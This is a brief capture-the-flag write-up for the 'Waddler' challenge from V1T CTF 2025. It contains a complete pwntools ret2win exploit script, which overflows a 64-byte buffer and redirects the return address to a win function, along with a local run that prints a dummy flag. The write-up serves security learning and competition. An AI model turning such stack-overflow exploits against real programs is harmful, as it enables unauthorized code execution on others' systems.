tsune Help

2025-1

Challenge information

  • CTF: V1T CTF 2025

  • Challenge: Waddler

  • Solves: 387

  • Description: Poke it the right way and it hums back something useful.

  • Time-wasting to solve: 3 min

Writeup

AAH, obviously ret2win.

Screenshot_20251102_224948.png
from pwn import * from icecream import ic import sys e = ELF("chall",checksec=False) libc = ELF("/usr/lib/x86_64-linux-gnu/libc.so.6",checksec=False) ld = ELF("/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2",checksec=False) nc = "nc 127.0.0.1 9999" if "nc" in nc: HOST = nc.split(" ")[1] PORT = int(nc.split(" ")[2]) if "http" in nc: from urllib.parse import urlparse HOST = urlparse(nc).hostname PORT = urlparse(nc).port dbg = 1 g_script = """ #set max-visualize-chunk-size 0x300 """ context.binary = e if len(sys.argv) > 1: io = remote(host=HOST,port=PORT) else: io = e.process() if dbg: gdb.attach(io,g_script) s = lambda b: io.send(b) sa = lambda a,b: io.sendafter(a,b) sl = lambda b: io.sendline(b) sln = lambda b: io.sendline(str(b).encode()) sla = lambda a,b: io.sendlineafter(a,b) r = lambda : io.recv() ru = lambda b:io.recvuntil(b) rl = lambda : io.recvline() pu32= lambda b : u32(b.ljust(4,b"\0")) pu64= lambda b : u64(b.ljust(8,b"\0")) hlog= lambda i : print(f"[*]{hex(i)}") fsp = lambda b : f"%{b}$p".encode() shell = lambda : io.interactive() payload = b"" def rst():global payload;payload = b"";log.info("***PAYLOAD RESET***") def pay(*args, **kwargs): global payload; payload += b"".join([a if type(a) == bytes else (a.encode() if type(a) == str else p64(a)) for a in args]) pay( b"A"*0x40, 0x0000000000405000-0x20, 0x040129b, ) sl(payload) shell()
[~/dc/ctf/v1t/Waddler]$python3 e.py [+] Starting local process '/home/tsuneki/dc/ctf/v1t/Waddler/chall': pid 17703 [*] running in new terminal: ['/usr/bin/gdb', '-q', '/home/tsuneki/dc/ctf/v1t/Waddler/chall', '-p', '17703', '-x', '/tmp/pwnlib-gdbscript-y8djc5f3.gdb'] [+] Waiting for debugger: Done [*] Switching to interactive mode The Ducks are coming! FLAG: FLAG{DUMMY_FLAG_FOR_TESTING} [*] Got EOF while reading in interactive $ [*] Interrupted [*] Process '/home/tsuneki/dc/ctf/v1t/Waddler/chall' stopped with exit code -11 (SIGSEGV) (pid 17703)
Last modified: 04 November 2025
2025-2picoCTF2024 Writeup